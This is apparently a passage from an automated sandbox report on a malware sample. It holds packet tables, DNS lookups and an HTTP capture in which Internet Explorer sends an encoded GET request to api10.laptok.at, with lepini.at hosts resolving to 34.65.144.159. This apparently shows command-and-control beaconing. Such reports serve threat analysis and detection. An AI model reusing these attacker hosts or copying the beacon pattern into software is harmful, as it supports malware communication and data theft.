Feb 15, 2021 21:27:40.402054071 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:49.731172085 CET	49773	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:49.779237032 CET	80	49773	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:49.780008078 CET	49773	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:49.780139923 CET	49773	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:49.866309881 CET	80	49773	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:50.445771933 CET	80	49773	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:50.445962906 CET	49773	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.446897030 CET	49773	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.493998051 CET	80	49773	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:50.689157963 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.736382008 CET	80	49774	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:50.736491919 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.736696959 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.736718893 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:50.781907082 CET	80	49774	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:51.290230989 CET	80	49774	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:51.290327072 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:51.304138899 CET	49774	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:51.354929924 CET	80	49774	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:51.899374962 CET	49775	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:51.944946051 CET	80	49775	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:51.945208073 CET	49775	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:51.945363045 CET	49775	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:52.034024954 CET	80	49775	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:52.335773945 CET	80	49775	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:52.335907936 CET	49775	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:52.335988998 CET	49775	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:52.383759975 CET	80	49775	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:55.107456923 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.107517958 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.107539892 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.107585907 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.107707024 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.107719898 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.111418962 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:27:55.113121033 CET	49733	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:27:55.151155949 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151200056 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151233912 CET	443	49749	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151264906 CET	443	49751	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151287079 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151297092 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151328087 CET	443	49747	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151355982 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151376963 CET	443	49746	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.151397943 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151410103 CET	49749	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151421070 CET	49751	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151545048 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151571989 CET	49747	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151623011 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.151638031 CET	49746	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.153126955 CET	443	49750	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.153172016 CET	443	49750	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.153460026 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.153466940 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.153486967 CET	49750	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.153502941 CET	443	49748	151.101.1.44	192.168.2.5
Feb 15, 2021 21:27:55.153860092 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.153881073 CET	49748	443	192.168.2.5	151.101.1.44
Feb 15, 2021 21:27:55.160887003 CET	443	49732	104.20.184.68	192.168.2.5
Feb 15, 2021 21:27:55.161242008 CET	49732	443	192.168.2.5	104.20.184.68
Feb 15, 2021 21:27:55.162348986 CET	443	49733	104.20.184.68	192.168.2.5
Feb 15, 2021 21:27:55.162611008 CET	49733	443	192.168.2.5	104.20.184.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2021 21:25:56.284198046 CET	53	63183	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:57.168649912 CET	60151	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:57.220179081 CET	53	60151	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:58.194308043 CET	56969	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:58.247823954 CET	53	56969	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:59.202315092 CET	55161	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:59.262110949 CET	53	55161	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:00.204469919 CET	54757	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:00.257827997 CET	53	54757	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:03.868232012 CET	49992	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:03.931744099 CET	53	49992	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:05.465224981 CET	60075	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:05.522725105 CET	53	60075	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:05.789064884 CET	55016	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:05.837735891 CET	53	55016	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:06.485084057 CET	64345	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:06.534570932 CET	53	64345	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:06.564721107 CET	57128	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:06.632179022 CET	53	57128	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.017072916 CET	54791	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.076967955 CET	53	54791	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.495734930 CET	50463	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.550903082 CET	53	50463	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.783668995 CET	50394	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.847328901 CET	53	50394	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:11.728142977 CET	58530	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:11.795772076 CET	53	58530	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:14.101337910 CET	53813	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:14.172207117 CET	53	53813	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:15.036911964 CET	63732	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:15.099294901 CET	53	63732	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:15.213633060 CET	57344	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:15.265760899 CET	53	57344	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:16.454019070 CET	54450	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:16.513926983 CET	53	54450	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:17.642267942 CET	59261	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:17.701730013 CET	53	59261	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:31.835122108 CET	57151	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:31.885976076 CET	53	57151	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:33.817640066 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:33.872474909 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:34.826550007 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:34.878036022 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:35.049802065 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:35.098500013 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:35.859178066 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:35.910677910 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:36.063472986 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:36.112749100 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:37.071190119 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:37.120393991 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:37.868421078 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:37.920197010 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:39.073786020 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:39.124480009 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:41.880002022 CET	59413	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:41.931582928 CET	53	59413	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:43.082843065 CET	60516	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:43.131458044 CET	53	60516	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:43.263675928 CET	51649	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:43.323553085 CET	53	51649	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:44.941044092 CET	65086	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.008936882 CET	53	65086	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:45.277362108 CET	56432	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.339874029 CET	53	56432	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:45.445666075 CET	52929	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:45.494220972 CET	53	52929	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:46.542140007 CET	64317	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:46.846108913 CET	53	64317	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:49.186588049 CET	61004	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:49.246994019 CET	53	61004	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:50.084008932 CET	56895	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:50.146209955 CET	53	56895	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:50.620853901 CET	62372	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:50.683176041 CET	53	62372	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:02.578643084 CET	61515	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:02.640185118 CET	53	61515	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:31.385003090 CET	56675	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:31.436376095 CET	53	56675	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:39.532502890 CET	57172	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:39.821945906 CET	53	57172	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.079586029 CET	55267	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.082242012 CET	50969	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.128356934 CET	53	55267	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.130829096 CET	53	50969	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:49.667834044 CET	64362	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:49.726691961 CET	53	64362	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:50.630992889 CET	54766	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:50.688483000 CET	53	54766	8.8.8.8	192.168.2.5
Feb 15, 2021 21:27:51.838350058 CET	61446	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:27:51.898437023 CET	53	61446	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:01.330615044 CET	57515	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:01.398981094 CET	53	57515	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:30.030843973 CET	58199	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:30.079400063 CET	53	58199	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:30.584244013 CET	65221	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:30.644023895 CET	53	65221	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:31.193239927 CET	61573	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:31.250427008 CET	53	61573	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:31.901190996 CET	56562	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:31.960284948 CET	53	56562	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:32.341228008 CET	53591	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:32.403213024 CET	53	53591	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:32.968156099 CET	59688	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:33.026062012 CET	53	59688	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:34.117602110 CET	56032	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:34.168524981 CET	53	56032	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:34.773286104 CET	61150	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:34.823050022 CET	53	61150	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:35.605218887 CET	63458	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:35.662259102 CET	53	63458	8.8.8.8	192.168.2.5
Feb 15, 2021 21:28:36.069313049 CET	50422	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:28:36.128927946 CET	53	50422	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 15, 2021 21:26:05.789064884 CET	192.168.2.5	8.8.8.8	0xac24	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:09.017072916 CET	192.168.2.5	8.8.8.8	0xa9c0	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:09.495734930 CET	192.168.2.5	8.8.8.8	0x2ff	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:09.783668995 CET	192.168.2.5	8.8.8.8	0x53e8	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:11.728142977 CET	192.168.2.5	8.8.8.8	0x1abe	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:14.101337910 CET	192.168.2.5	8.8.8.8	0x4575	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:15.036911964 CET	192.168.2.5	8.8.8.8	0xe967	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:15.213633060 CET	192.168.2.5	8.8.8.8	0x5df8	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:16.454019070 CET	192.168.2.5	8.8.8.8	0x53db	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:43.263675928 CET	192.168.2.5	8.8.8.8	0xa1d5	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:46.542140007 CET	192.168.2.5	8.8.8.8	0x2695	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:50.084008932 CET	192.168.2.5	8.8.8.8	0x74df	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:39.532502890 CET	192.168.2.5	8.8.8.8	0x874c	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.079586029 CET	192.168.2.5	8.8.8.8	0x362d	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.082242012 CET	192.168.2.5	8.8.8.8	0x4cf5	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.667834044 CET	192.168.2.5	8.8.8.8	0x54f6	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:50.630992889 CET	192.168.2.5	8.8.8.8	0xf41a	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:51.838350058 CET	192.168.2.5	8.8.8.8	0xfc4	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 15, 2021 21:26:05.837735891 CET	8.8.8.8	192.168.2.5	0xac24	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:09.076967955 CET	8.8.8.8	192.168.2.5	0xa9c0	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:09.550903082 CET	8.8.8.8	192.168.2.5	0x2ff	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:09.550903082 CET	8.8.8.8	192.168.2.5	0x2ff	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:09.847328901 CET	8.8.8.8	192.168.2.5	0x53e8	No error (0)	contextual.media.net		23.210.250.97	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:11.795772076 CET	8.8.8.8	192.168.2.5	0x1abe	No error (0)	lg3.media.net		23.210.250.97	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:14.172207117 CET	8.8.8.8	192.168.2.5	0x4575	No error (0)	hblg.media.net		23.210.250.97	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:15.099294901 CET	8.8.8.8	192.168.2.5	0xe967	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:15.265760899 CET	8.8.8.8	192.168.2.5	0x5df8	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:15.265760899 CET	8.8.8.8	192.168.2.5	0x5df8	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET	8.8.8.8	192.168.2.5	0x53db	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET	8.8.8.8	192.168.2.5	0x53db	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET	8.8.8.8	192.168.2.5	0x53db	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET	8.8.8.8	192.168.2.5	0x53db	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:16.513926983 CET	8.8.8.8	192.168.2.5	0x53db	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:43.323553085 CET	8.8.8.8	192.168.2.5	0xa1d5	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:46.846108913 CET	8.8.8.8	192.168.2.5	0x2695	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:26:50.146209955 CET	8.8.8.8	192.168.2.5	0x74df	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:39.821945906 CET	8.8.8.8	192.168.2.5	0x874c	No error (0)	c56.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.128356934 CET	8.8.8.8	192.168.2.5	0x362d	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.130829096 CET	8.8.8.8	192.168.2.5	0x4cf5	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:49.726691961 CET	8.8.8.8	192.168.2.5	0x54f6	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:50.688483000 CET	8.8.8.8	192.168.2.5	0xf41a	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 15, 2021 21:27:51.898437023 CET	8.8.8.8	192.168.2.5	0xfc4	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49755	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:26:43.380824089 CET	3073	OUT	GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 15, 2021 21:26:43.847129107 CET	3074	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:26:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 50 10 44 0f c4 82 9c 96 e4 9c 33 3b 32 08 10 88 0c a7 37 5e b9 5c b6 15 fe 9f e9 7e af ca 32 5a 92 58 bd c3 b3 ad 5f 41 52 c6 09 17 b1 36 d6 87 7b 19 67 96 45 82 56 ad 6a 44 6e 28 33 5e a6 77 10 c3 2d ea 6b 90 60 5f 0a 1d 88 64 ca 72 64 3f ad 1a e1 7b 51 60 10 c8 64 6b 84 05 ed c1 8c 20 51 6a 52 11 7e b2 9e 3d 18 a6 b3 a6 56 61 a7 e5 a8 e5 63 87 16 01 32 fc 47 4b 15 a2 0a f9 51 ce 05 27 cc 42 9b c3 d4 f5 b3 4b 35 64 92 02 40 7f 65 e3 d6 9c 1b a8 a6 51 3f 7e d4 d5 90 1f 4b d7 f7 6d a0 cf ae 19 22 f7 51 c4 75 fc 9d da 7c 03 ea 45 73 63 4c cc 0b ff 0d 81 24 b7 39 9b 7b 78 69 ae 14 2b ec 74 f6 5b aa 78 e6 8f de 13 6d 35 9d 4d 8f c1 d1 df a5 f9 f2 c1 85 a9 19 8c 64 a9 7c d2 c4 e2 7c 44 2e bd be db 84 54 b5 c4 87 93 94 35 3a ec e4 58 b5 52 5b 7a b3 2c 4d 19 bf cc ea 4d b4 f1 71 9a a2 5a 07 f0 ef c1 bd 2d 5c c3 86 50 40 8e 80 48 19 87 8f 1c 8f 74 7c 26 2a c2 29 1f 40 18 14 a7 0b 44 d0 39 7d 74 41 b1 f4 50 05 a3 ba fa 71 9b c4 0b 02 96 37 94 21 2e c2 2f 6a 98 ef 93 57 3f 95 c9 8f 3d cf 92 9b 07 20 20 2d 06 d0 69 ab b8 df 8d 28 ff b1 e1 b3 7e c9 44 4d 07 18 3e 80 d8 3e 77 7f 0d 64 3c aa d4 c3 ef 01 91 29 b3 33 32 b7 c5 18 ea ad 04 71 81 8a 9b 87 e7 40 69 0a 60 d7 ce 66 f5 b0 d8 2f 16 38 df 63 9f 4b e3 a6 b2 e0 7d 04 f3 f0 87 f4 fe 16 07 57 29 fd 42 60 08 74 0e 5e 7b b1 a1 56 8f 1c 38 63 9c 16 48 06 08 25 07 46 8c ee 8d 1e f5 11 4d 06 c0 6f 85 ef a7 96 5f 12 bb 82 22 31 88 a4 51 fa 44 b0 cd c1 d7 47 df d5 0f 40 cd 9e f4 34 1c fd 93 9e e9 c6 c7 f8 07 ab 0b 89 c2 fa 64 84 e0 5a 10 e1 31 02 e9 91 98 98 5b 92 12 d2 fc 1a 41 03 79 03 bb de bf 73 2f 22 1a 1a f1 48 f5 5e a8 67 d8 74 1f 84 ba bd 23 7b a2 e8 da 3e ad a8 8e 61 04 20 e3 6c 7e 0c 47 c4 f3 0a ff 78 fd b8 20 3a a1 48 e6 0e 90 14 a4 61 81 5a 75 de c6 d7 36 c7 00 57 92 08 f1 49 03 b5 72 a2 f8 44 c4 e3 3a 7a e6 ee a2 e3 33 50 ba a6 81 27 63 dd 13 f8 53 66 27 8f 61 1e 16 0c a5 8c 70 18 8f 60 26 a1 a2 d3 14 36 93 70 3b 64 da 52 44 8f a4 18 ca be 81 39 04 57 65 d1 b6 4d d8 f7 cc 68 61 a2 52 5c 2f 20 ea e7 d7 cf 3e f4 ab aa 43 69 c7 66 cb be cf 2f 70 2e 31 23 88 ad 10 7a e6 5a dd ef 69 e5 dd 88 4e f9 1c 4a 45 8b 7a 3f d4 9d 85 4e 3f f2 94 b1 a8 80 5d 36 a5 f8 dd dd ae 36 23 ef ff 00 1d 14 d2 b9 5c 7c a5 9b 02 66 1f 7f 74 3a 40 ed 77 ab 38 25 10 01 14 5f e2 8f bf d6 df 7e 20 b3 4b ad ee 62 66 c3 09 05 6e d1 95 75 6b 86 d5 b3 00 ca d1 4f b6 81 87 c1 ba c4 28 07 4c a1 62 2c 71 18 6e 49 d8 6d ce 0f ea d3 97 a2 7b bf ba 89 61 0f f7 e0 42 b7 5d 19 71 7b 20 82 4b 68 20 ce c7 fe 1a 3b a5 78 37 d7 da d6 71 35 d7 c7 31 b5 46 34 38 97 1f fb 09 8a d9 c6 86 66 04 ac 14 f9 f7 19 66 04 77 e8 af 23 49 48 2c 94 82 a7 93 f7 52 2d 12 22 ac fa 3d c1 66 0f 08 c1 ae 15 34 12 b5 a7 7b 9b 1d 03 b5 b7 e3 40 a3 91 1d 94 f6 a3 e5 e9 11 c4 91 75 bc 9f 2d 6b 8f fd 0c 2a b7 19 63 b8 f0 17 b3 9c 8e 60 b2 2e f8 3b 03 bd e5 07 c9 71 9b 50 46 81 d9 35 59 4e c7 44 07 25 7b e4 f9 c2 82 f0 fb 00 65 fa bb dc c5 05 05 74 bf 43 39 f1 a5 1e 8b 05 42 06 c9 7c 60 50 e4 2b a3 a4 2e 37 62 d3 dc 4d 7a 1e 8f 22 01 7d 19 87 3d 46 3c 4e 66 85 47 fe 95 7e 01 8a 2b 7c ca 9c 95 7f 8d c4 e4 fb 35 f7 30 f0 Data Ascii: 2000GrPD3;27^\~2ZX_AR6{gEVjDn(3^w-k`_drd?{Q`dk 